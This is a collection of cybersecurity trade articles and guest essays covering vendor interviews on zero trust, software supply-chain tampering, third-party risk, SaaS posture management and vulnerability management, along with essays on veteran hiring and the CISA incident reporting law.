The zero trust approach to enterprise security is well on its way to mainstream adoption. This is a very good thing.

Related: Covid 19 ruses used in email attacks

At RSA Conference 2022, which takes place next week in San Francisco, advanced technologies to help companies implement zero trust principals will be in the spotlight. Lots of innovation has come down the pike with respect to imbuing zero trust into two pillars of security operations: connectivity and authentication.

However, there’s a third pillar of zero trust that hasn’t gotten quite as much attention: directly defending data itself, whether it be at the coding level or in business files circulating in a highly interconnected digital ecosystem. I had a chance to discuss the latter with Ravi Srinivasan, CEO of  Tel Aviv-based Votiro which launched in 2010 and has grown to  .

Votiro has established itself as a leading supplier of advanced technology to cleanse weaponized files. It started with cleansing attachments and weblinks sent via email and has expanded to sanitizing files flowing into data lakes and circulating in file shares. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Digital fuel

Votiro’s new cloud services fit as a pillar of zero trust that is now getting more attention: directly protecting digital content in of itself. Zero trust, put simply, means eliminating implicit trust. Much has been done with connectivity and authentication. By contrast, comparatively little attention has been paid to applying zero trust directly to data and databases, Srinivasan observes. But that needs to change, he says. Here’s his argument:

Companies are competing to deliver innovative digital services faster and more flexibly than ever. Digital content creation is flourishing with intellectual property, financial records, marketing plans and legal documents circulating within a deeply interconnected digital ecosystem.

Digital content has become the liquid fuel of digital commerce—and much of it now flows into and out of massive data lakes supplied by Amazon Web Services, Microsoft Azure and Google Cloud. This transition happened rapidly, with scant attention paid to applying zero trust principles to digital content.

However, a surge of high-profile ransomware attacks and supply chain breaches has made company leaders very nervous. “I speak to a lot of security leaders around the world, and one of their biggest fears is the rapid rise of implementing data lakes and the fear that the data lake will turn into a data swamp,” Srinivasan says.

Votiro’s technology provides a means to sanitize weaponized files at all of the points where threat actors are now trying to insert them. It does this by permitting only known good files into a network, while at the same time  extracting unknown and untrusted elements for analysis. Votiro refined this service, cleansing weaponized attachments and web links sent via email, and has extended this service to cleansing files as they flow into a data lake and as they circulate in file shares. 

Exploiting fresh gaps

As agile, cloud-centric business communications has taken center stage, cyber criminals quite naturally have turned their full attention to inserting weaponized files wherever it’s easiest for them to do so, Srinivasan observes. As always, the criminals follow the data, he says.

Srinivasan

“The trend that we’re seeing is that more than 30 percent of the content flowing into data lakes is from untrusted sources,” he says. “It’s documents, PDFs, CSV files, Excel files, images, lots of unstructured data; we track 150 different file types . . . we’re seeing evasive objects embedded in those files designed to propagate downstream within the enterprise.”

This is the dark side of digital transformation. Traditionally, business applications tapped into databases kept on servers in a temperature-controlled clean room — at company headquarters. These legacy databases were siloed and well-protected; there was one door in and one door out.

Data – i.e. coding and content — today fly around intricately connected virtual servers running in private clouds and public clouds. As part of this very complex, highly distributed architecture, unstructured data flows from myriad sources into and back out of partner networks, cloud file shares and data lakes. This in-flow and out-flow happens via custom-coded APIs configured by who knows whom.

Votiro’s cleansing scans work via an API that attaches to each channel of content flowing into a data lake. This cleansing process is shedding light on the fresh security gaps cyber criminals have discovered – and have begun exploiting, Srinivasan says.

Evolving attacks

He told me about this recent example: an attacker was able to slip malicious code into a zip file sent from an attorney to a banking client in a very advanced way. The attacker managed to insert attack code into a zip file contained in a password-protected email message – one that the banker was expecting to receive from the attorney.

At a fundamental level, this attacker was able to exploit gaps in the convoluted matrix of interconnected resources the bank and law firm now rely on to conduct a routine online transaction. “Bad actors are constantly evolving their techniques to compromise the organization’s business services,” Srinivasan says.

Closing these fresh gaps requires applying zero trust principles to the connectivity layer, the authentication layer — and the content layer, he says. “What we’re doing is to deliver security as a service that works with the existing security investments companies have made,”  Srinivasan  says. “We integrate with existing edge security and data protection capabilities as that final step of delivering safe content to users and applications at all times.”

It’s encouraging that zero trust is gaining material traction at multiple layers. There’s a lot more ground to cover. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The Solar Winds breach and the disclosure of the massive Log4J vulnerability have put company decision makers on high alert with respect to this freshly-minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the Solar Winds breach, for instance, tampered with a build system of the widely-used Orion network management tool. They then were able to trick some 18,000 companies into deploying an authentically-signed Orion update carrying a heavily-obfuscated backdoor.

Log4J, aka Log4Shell, refers to a gaping vulnerability that exists in an open-source logging library that’s deeply embedded within servers and applications all across the public Internet. Its function is to record events in a log for a system administrator to review and act upon. Left unpatched, Log4Shell, presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.

This type of attack takes advantage of the highly dynamic, ephemeral way software interconnects to make modern digital services possible.

Pericin

“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion can arise anytime a developer reaches out to a package repository. Modern software is built on pillars of open-source components, and package repositories offer an easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements; and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a back door through which they can come and go – and take full control of the underlying system anytime they please, Pericin says.

Last year, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to tamper with coding deep inside of system software at Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp!.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current, operating environment, there’s limitless opportunity to tamper with code. This is because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising – due to their intensive use of built-on third party code and open source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that its applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize the documentation of a complete list of authorized components in a software application.

President Biden’s cybersecurity executive order, issued in May, includes a detailed SBOM requirement for all software delivered to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

 

Third-Party Risk Management (TPRM) has been around since the mid-1990s – and has become something of an auditing nightmare.

Related: A call to share risk assessments

Big banks and insurance companies instilled the practice of requesting their third-party vendors to fill out increasingly bloated questionnaires, called bespoke assessments, which they then used as their sole basis for assessing third-party risk.

TPRM will be in the spotlight at the RSA Conference 2022 next week in San Francisco. This is because third-party risk has become a huge problem for enterprises in the digital age. More so than ever, enterprises need to move beyond check-the-box risk assessments; there’s a clear and present need to proactively mitigate third-party risks.

The good news is that TPRM solution providers are innovating to meet this need, as will be showcased at RSA. One leading provider is Denver, Colo.-based CyberGRX. I had the chance to sit down with their CISO, Dave Stapleton, to learn more about the latest advancements in TPRM security solutions. For a full drill down of our discussion, please give the accompanying podcast a listen. Here are key takeaways:

Smoothing audits

CyberGRX launched in 2016 precisely because bespoke assessments had become untenable. Questionnaires weren’t standardized, filling them out and collecting them had become a huge burden, and any truly useful analytics just never happened.

“Sometimes you’d get a 500-question questionnaire and that would be one out of 5,000 you’d get over the course of a year,” Stapleton says, referring to a scenario that a large payroll processing company had to deal with.

CyberGRX created an online exchange to serve as a clearinghouse where assessments could be more efficiently – and usefully – administered. Digital transformation had taken hold; so their timing was pitch perfect.

“Usage of third-party vendors has escalated exponentially in the past 10 years, and businesses also rely on them for more sensitive and critical activities,” Stapleton noted.

Moving the questionnaires to an exchange model meant introducing a standardized crowdsourcing approach to compiling and making available what was previously bespoke assessment data. This also made remediation – i.e. getting third-party vendors to mitigate potential risks and maintain compliance with audit benchmarks – much smoother.

Stapleton

This alone was a huge improvement. “The exchange model has been quite revolutionary,” Stapleton says. “We were able to reduce the level of effort for both third parties and their customers. Third parties get fewer requests so they can focus more time and energy on security; customers have one place they can go to get the data they need.”

Cyber risks profiling

CyberGRX’s global cyber risk Exchange caught on quickly. But, the company founders never intended to stop at simply cleaning up bespoke  assessments. The exchange has proven to be a perfect mechanism for fleshing out much richer cyber risk profiles of third-party vendors. It does this by ingesting and correlating data from a wide array of security-related  datasets.

This folds in fresh intelligence that goes far beyond the ground covered in traditional bespoke assessments, which are merely the starting point. Questionnaire answers get cross referenced against cybersecurity best practice protocols put out by the National Institute of Standards and Technology, namely NIST 800-53 and NIST 800-171.

CyberGRX is also able to leverage real-time threat intelligence feeds by partnering with leading threat intelligence vendors. These vendors integrate their abilities to monitor malware circulation and cyber-attack activity in real time within the Exchange platform, including staying alert for any signs of third-party vendor cyber assets turning up in murky parts of the Dark Web.

Another function of the Exchange is to analyze a third-party vendor’s “firmographics” – publicly known details such as geographic location, industry type, target markets, business performance and organizational structure. So contextual industry background and fresh threat landscape intel gets continually infused into traditional audit findings. Stapleton characterizes this as “cyber risk intelligence” profiling.

“The idea behind it is that this is a process of collecting the right data, creating your own quality data and performing very complex analysis in order to produce actionable results,” he says.

Cyber hygiene boost

This enrichment of the check-the-box approach to third-party risk assessments is paying off on a number levels, he says. Material productivity gains derive from risk managers on both sides spending much less time mucking with bespoke audits. “”Our methodology provides security and risk professionals with next-level insights that empower them to quickly make decisions in regards to risk management. Therefore, spending less time on mitigating risks and more time focusing on other important initiatives”,” Stapleton says.

More nuanced benefits accrue, as well. For instance, as more substantive vetting of third-party vendors gains traction, the overall level of supply chain cyber hygiene gets boosted. Third parties quickly discover that checking boxes isn’t going to be enough; first-party enterprises gain clarity, in a very practical sense, on security practices they need to prioritize.

Observes Stapleton:  “It’s a combination of capabilities that produces something that is truly actionable, specifically for the purposes of improving third party risk management outcomes.”

The ceiling for strengthening security postures – of third parties and first parties alike — is high. For instance, Stapleton described for me how CyberGRX can now correlate firmographics to threat intel feeds and audit data to provide innovative new services that were unheard of just a couple of years ago.

For one, the exchange can now reliably predict how a vendor will respond to a risk assessment without having them input any information. Thus, an enterprise can weigh whether to accept a given supplier — without necessarily administering a full-blown assessment audit.

For another, the exchange is continually improving its capacity to granularly gauge a third-party vendor’s exposure to a high-profile vulnerability or even a certain type of exploit known to be circulating in the wild.

“We can map to something like the MITRE ATT&CK framework and perform an analysis that tells you which of your third parties are most likely to be vulnerable to something like Log4J.”

What’s more, advanced third-party risk mitigation can also help offset the cybersecurity skills shortage. “We’re putting our security professionals back to work instead of filling out spreadsheets,” Stapleton asserts, “and we’re giving enterprises information they can use to start working with their third parties today to improve security of the supply chain.”

This is one part of igniting a virtuous cycle. New cloud-centric security frameworks, like Zero Trust Network Access (ZTNA) and Secure Access Services Edge (SASE) Access, and new security tools – to advance detection and response, as well as properly configure all cyber assets —  must take hold as well. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic in that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM.) SSPM is part of emerging class of security tools that are being ramped up to help companies dial-in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud guaranteed that the hosted IT infrastructure they sought to rent to enterprises would be security-hardened – at least on their end. For subscribers, the tech giants issued a sprawling set of security settings for their customers’ security teams to monkey with. It was left up to each company to dial-in just the right amount of security-vs-convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.

Bin

What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past  doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology recognized this huge security gap for what it was, and issued NIST 800-53 and NIST 800-171 –detailed criteria for securely configuring cloud connections. But many companies simply shrugged off the NIST protocols.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One or Solar Winds or Colonial Pipeline.

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations is huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

Vulnerability management, or VM, has long been an essential, if decidedly mundane, component of network security.

Related: Log4J’s long-run risks

That’s changing — dramatically. Advanced VM tools and practices are rapidly emerging to help companies mitigate a sprawling array of security flaws spinning out of digital transformation.

I visited with Scott Kuffer, co-founder and chief operating officer of Sarasota, FL-based Nucleus Security, which is in the thick of this development. Nucleus launched in 2018 and has grown to over 50 employees. It supplies a unified vulnerability and risk management solution that automates vulnerability management processes and workflows.

We discussed why VM has become acutely problematic yet remains something that’s vital for companies to figure out how to do well, now more so than ever. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Multiplying exposures

Scan and patch. Historically, this has been what VM was all about. Microsoft’s Patch Tuesday speaks to the never-ending flow of freshly discovered software flaws — and the software giant’s best efforts ease the burden of mitigating them.

Scan-and-patch systems from Tenable, Qualys, Rapid7, Checkmarx and others came along and became indispensable; enterprises could use these tools to keep software bugs and security holes patched at a tolerable level; not just flaws in Microsoft code, of course, but software from all of their suppliers, internal and external.

However, that scan-and-patch equilibrium is no more. Digital transformation has spawned a cascade of nuanced, abstract vulnerabilities – and they’re everywhere. This results from companies chasing after agile software development and cloud-centric innovations, above all else. In aggressively leveraging digital services to achieve productivity gains they’ve also exponentially multiplied security gaps across a steadily expanding network attack surface.

“There are configuration weaknesses in cloud resources, vulnerabilities that need patching,  like Log4J, and vulnerabilities in the business logic of old code,” Kuffer observes. “There are many different types of these vulnerabilities, and it’s a matter of figuring out who owns them and how to fix them quickly, and, also, which ones to fix.”

Current threat landscape

So, what exactly constitutes a vulnerability these days? As Kuffer alluded to not long into our discussion, it goes far beyond the bug fixes and security patches that Microsoft, Oracle, Adobe and every supplier of business software distributes periodically.

Kuffer

A vulnerability, simply put, is a coding weakness by which software can be manipulated in a way that was never intended. Today, these exposures lurk not just in the legacy enterprise apps – the ones that need continually patching – they’re turning up even more so in the cloud-hosted storage buckets, virtual servers and Software-as-a-Service (SaaS) subscriptions that have become the heart of IT operations.

It all starts with DevOps, under which agile software is being pushed out based on the principle of continuous integration and continuous delivery (CI/CD.) Much heralded, CI/CD is a set of principles said to result in the delivery new software frequently and reliably.

Truthfully, CI/CD really is nothing more than an updated version rushing shrink-wrapped boxes of new apps to store shelves. Remember when early adopters were giddy to receive the bug-riddled version 1.0 of a cool new app, anticipating that major bugs would get fixed in 1.1, 1.2 etc.?

Under CI/CD, developers collaborate remotely to press new code into live service as fast as possible and count on making iterative fixes on the fly.

This fail-fast imperative often leverages cloud storage and virtual servers; code development revolves around interconnecting modular microservices and software containers scattered all across public and private clouds.

To malicious hackers this translates into a candy store of fresh vulnerabilities. In many ways it’s easier than ever for threat actors to get deep access, steal data, spread ransomware, disrupt infrastructure and attain long run unauthorized access.

Unified solution

All of that said, it’s not so much the agile software trend, in and of itself, that’s to blame. Security gaps generally — and vulnerabilities specifically — have surpassed the tolerable level in large part because companies have not paid nearly enough attention to configuring their public cloud and hybrid cloud IT systems. In short, software interconnections are skewed toward agility.

Fine tuning is in order and there’s really no mystery how to go about dialing in the necessary measure of security. Robust data security frameworks have been painstakingly assembled and vetted by the National Institute of Standards and Technology (NIST.) However, adhering to NIST 800-53 and NIST 800-171 is voluntary and, for whatever reasons, far too many enterprises have yet to fully embrace robust data security best practices.

To illustrate, Kuffer pointed me to the all-too-common scenario where a company goes live with an AWS root account that uses a default password to access all of it its EC2 virtual servers and S3 storage buckets. “That misconfiguration is a vulnerability because anybody who finds that password and then logs in to your AWS account has full admin control over your entire cloud infrastructure,” he says.

This kind of thing can be rectified by adopting risk-assessment principles alongside CD/CI. And the good news, Kuffer says, is that the cybersecurity industry is driving towards helping companies get better at systematically identifying, analyzing and controlling vulnerabilities. Nucleus Security refers to this as a shift towards “.”

Risk-tolerance security

VM done from a risk-assessment lens boils down to enterprises making a concerted effort to discover and thoughtfully inventory all of the coding flaws and misconfigurations inhabiting their increasingly cloud-centric networks, and then doing triage based on risk-tolerance principles.

This absolutely can be done, ironically, because cybersecurity vendors themselves are innovating off the strengths of cloud resources and agile software. At RSA Conference 2022 opening next week in San Francisco, there will be considerable buzz around new tools and frameworks that empower companies to discover and inventory software bugs and misconfigurations, cost-effectively and at scale.

This includes a host of leading-edge technologies supporting emerging frameworks such cyber asset attack surface management (CAASM,) cloud security posture management (CSPM,) application security posture management (ASPM,) and even software-as-a-service security posture management (SSPM.)

Specialized analytics platforms — like those from Nucleus Security and other suppliers of advanced VM technologies – fit in by enabling companies to ingest security posture snapshots from all quarters, Kuffer says. Advanced VM systems are designed to efficiently implement and enforce wise policy, without unduly disrupting agility, he says.

Clearly, the frameworks and technology are ready for prime time. If the continuing ransomware scourge and widening supply chain hacks tell us anything, it’s that it’s high time for companies to dial back on agility and dial in more security. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

It’s no secret that cybersecurity roles are in high demand. Today there are more than 500,000 open cybersecurity roles in the U.S., leaving organizations vulnerable to cyber threats.

Related: Deploying employees as threat sensors

Meanwhile, 200,000 well-trained and technically skilled military service members are discharged each year.

These individuals have many transferable skills that would make cybersecurity a prosperous civilian career. Yet, there’s still work to be done to make this path more accessible and known among the veteran and transitioning military community.

Fundamentally, cybersecurity professionals identify weaknesses and design systems and processes to protect any organization — government agencies, private companies — from cyberattacks. Veterans have the characteristics that make them ideal for these roles. They’re exceptional at working in high-pressure environments, managing confidential information, solving complex problems and responding systematically.

Better still, cybersecurity jobs offer the individuals who have served our country a fulfilling career. Cybersecurity jobs are always available and offer many options for people who want to work remotely or move around the country for family or career reasons. Plus — they tend to pay well too. The average salary is $116,000 annually plus benefits.

While veterans are well-suited to transition into cybersecurity, there is often a disconnect when raising awareness about these opportunities and outlining paths to entry. Training and certification must become more accessible and hiring criteria must change to encourage veterans to apply for these roles.

For the cybersecurity industry in need of filling mission-critical roles, our responsibility is to make a concerted effort to help place these skilled individuals into jobs.

Koziol

Programs from private companies that focus on hiring veterans, offering free technical training and certification courses and upskilling existing veteran employees into cybersecurity roles could be an answer to our industry’s talent shortage. Including a veteran during the cybersecurity talent recruitment process is one way to create a more inclusive hiring process, as they understand the language, process and skills fellow veterans may have.

This experience can also be helpful when training cybersecurity talent. One example is a training program led by a veteran who once trained military members to prepare for combat. After many years and roles in his civilian life as a cybersecurity professional, he now leads (and built) the entire cybersecurity upskilling and training program for a large government contractor.

Arguably, one of the most critical changes needed will be to adapt hiring practices to help candidates without a traditional college education enter into these critical roles. Stringent job requirements for entry-level cybersecurity positions are some of the biggest hurdles facing those trying to break in — especially veterans who won’t be applying with a traditional college degree or the corporate experience often required.

Loosening these restrictions has been shown to work. A recent survey from Infosec revealed that hiring managers successfully filling cybersecurity roles were considering more inexperienced candidates, actively recruiting diverse candidates and emphasizing attributes like leadership skills, certifications, and communication skills.

Beyond lowering these barriers to entry, a key to placing these individuals in cybersecurity roles is forming partnerships that facilitate hands-on training, certifications, apprenticeships, mentorships and industry connections to help veterans land their first cyber job. And it works.

One student who took a free Security+ Training Boot Camp with Infosec and VetsinTech recently landed a Security Engineer job at a Caterpillar, nearly doubling their previous civilian role salary (as a scientist). Another is using their cybersecurity training as part of a veterans scholarship to advance their career as a law enforcement detective and spearhead the department’s first dedicated cybercrime unit.

These stories show that partnerships between government, private and public are essential to guide veterans into cybersecurity roles with adequate training, certifications, professional connections and opportunities they need to break into the industry.

Many government and non-profit organizations like VetJobs and VetsinTech are doing just this. They provide free cybersecurity training and career development opportunities to transitioning service members, veterans, national guardsmen, reservists and military spouses.

As a security training provider, Infosec has formed partnerships with both of these organizations to provide hands-on certification training to veterans. No matter your organization’s size or type, I encourage you to reach out to them and see how your organization can collaborate to fill these gaps.

To stay ahead of the ever-changing landscape of cyber threats, we must think differently about hiring and training talent. After veterans break into our industry, they often serve as some of the most invaluable cybersecurity employees and leaders.

This is a call to upskill our country’s veterans into the cybersecurity roles we so desperately need.

About the essayist: Jack Koziol is the founder, SVP and GM of Infosec Institute, a cybersecurity education company. He is the author of The Shellcoder’s Handbook. When he’s not keeping the world safe by helping organizations educate their employees, he tries to get his three children to eat their breakfast and get to school on time.

In today’s times, we are more aware of cyberattacks as these have become front-page news. We most recently witnessed this as Russia invaded Ukraine. Cyberattacks were used as the first salvo before any bullet or missile was fired.

Related: The role of post-quantum encryption

We live in an increasingly digitized world where digital footprints are left behind, leaving evidence of nearly everything we do. This enables our adversaries to gain extremely valuable information and to steal, disrupt or even harm with simple keystrokes on a distant computer.

Quantum computers pose yet another looming threat since it has been mathematically proven that quantum computers with enough power will crack all the world’s public encryption. When these computers come online, any company or federal agency that is not upgraded to post-quantum cybersecurity will leave its data vulnerable to attackers. Even worse, data that is being stolen today is sitting on servers in other countries waiting to be decrypted by quantum computers.

Why Now?

It is now more important than ever for companies to share cyberattack and ransomware data with the government to ensure that we can defend and prepare much better than before.

On March 15, 2022, a new bipartisan legislation cyber incident reporting law called the “Cyber Incident Reporting for Critical Infrastructure Act” was passed by Congress and signed by President Joe Biden which requires critical infrastructure leaders in commercial enterprises and government to report cyber incidents to the Department of Homeland Security (DHS) cyber and infrastructure security agency (CISA).

Ransomware payments must be reported within 24 hours, and all cyber incidents must be declared within 72 hours. The reporting requirements, however, will not become effective until CISA provides rules and guidelines for entities that incur cyber incidents. CISA still needs to define which entities are required to report, and when cyber incidents qualify for reporting.

According to Michigan Senator Gary Peters, chair of the Senate Homeland Security Committee, “This provision will create the first holistic requirement for critical infrastructure operators to report cyber incidents so the federal government can warn others of the threat, prepare for widespread impacts, and help get our nation’s most essential systems back online so they can continue providing invaluable services to the American people.”

Sanzeri

At this point, companies and agencies that could be required to report fall under the Presidential Policy Directive 21 which includes these critical infrastructure areas: financial services, food and agriculture, government facilities, dams, critical manufacturing, communications, chemical, commercial facilities, defense industrial base, emergency services, energy, government facilities, healthcare, information technology, nuclear reactors, materials and waste, public health, transportation systems, and water systems.

The bill defines a cyber incident as “an occurrence that actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information on an information system, or actually or imminently jeopardizes, without lawful authority, an information system.”

Privacy is a concern

Any agency required to report cyber incidents can face shareholder and consumer backlash, and thus they have been hesitant to report breaches. We have seen in the past how many cyber incidents have gone unreported as large brands and agencies try to prevent a degradation of trust. However, in the case of this bill, there are sanctions designed to mitigate problems arising from reporting cyber and ransomware incidents. A partial list of the protections includes:

•CISA will anonymize the reporting entity

•All of the reported information will remain proprietary to the reporting entity if so desired

•Reports cannot be used in enforcement or regulatory actions against reporting entities

Some experts worry that inflexible and inaccurate requirements or expertise/staff shortages could cause confusion and do more harm than good. As with any great plan, success lies in the efficacious execution of tasks to ensure an optimal outcome. However, the tradeoff is that we will have a chance at understanding how our adversaries are targeting government agencies and commercial entities, as well as other critical infrastructure groups, with cyberattacks. If the information flow is timely and accurate, it will allow other entities to protect themselves prior to experiencing an already known but not widely distributed cyberattack type.

Sharing attack intel

This bill was considered urgent by government leaders because our commercial enterprises, federal agencies and suppliers of critical infrastructure have seen increased cyberattacks and ransomware breaches that dramatically affected our nation’s energy and food supplies, while disabling some schools. For example, in 2021 the Colonial Pipeline was hacked, and the company decided to pay $5 million in ransom since most of the East Coast’s fuel supply was shut down.

Panicked East Coast Americans began hoarding gas due to a major disruption in fuel supply. The company did not notify the federal government about the ransomware attack until well after it happened.

Many cyber and ransomware breaches currently go unreported because they create reputational problems for companies and government agencies. After all, who wants to report that they had a breach which has caused critical data or operational losses? For commercial enterprises, this can lead to lawsuits, decreased shareholder value, and a lack of confidence in the brand. For government agencies, leaders must admit cybersecurity failures.

However, if commercial, government and critical infrastructure entities can share information it will help all of us to quickly learn and prepare for such attacks. And, if information about cyber breaches and ransomware attacks is shared quickly enough, we can provide warning to our nation’s largest and most important companies and federal agencies which could mitigate further damage. This is even more urgent as quantum computers will increase our risk of critical infrastructure disruption or failure.

About the essayist: Skip Sanzeri is COO of QuSecure, supplier of QuProtect™, a state-of-the-art, software-based quantum security solution.

According to recent data from Oracle and KPMG, organizations today employ over 100 cybersecurity products to secure their environments. These products play essential roles in detecting and preventing threats.

Related: Taking a ‘risk-base’ approach to security compliance

However, because they generate thousands of alerts every day, this vast sprawl of security sources adds even more work to already over-stretched security teams. It could create a cybersecurity ticking time bomb.

Many organizations have recently undertaken rapid digital transformations in response to the ongoing pandemic and a societal shift toward a “work from anywhere” future. This hybrid model has created exciting opportunities for employees and organizations and significantly raised the security stakes.

Most combine the cloud, Office 365, and Active Directory to store and transfer sensitive corporate data, and they need security solutions to protect their entire environment as it grows and evolves. The once “protective perimeter” surrounding enterprise IT has dissolved, transforming it from a closed environment into one that spans far and wide with copious entry points.

To address this security challenge, organizations are deploying more security products today. This seems to be creating new problems in vendor sprawl, further burdening security teams with more to do. The challenge is that disparate vendors do not represent data in the same way, so there is no correlation between dashboards and metrics.

When organizations have two or three security platforms protecting their environment, security teams must toggle between them and make sense of disparate data sets. This often results in a lack of clarity, inhibiting them from seeing the big picture of what is really happening in their security environment. This is why cyber gangs tend to favor layered attacks. They’re harder to identify across disparate security data sets.

Espinosa

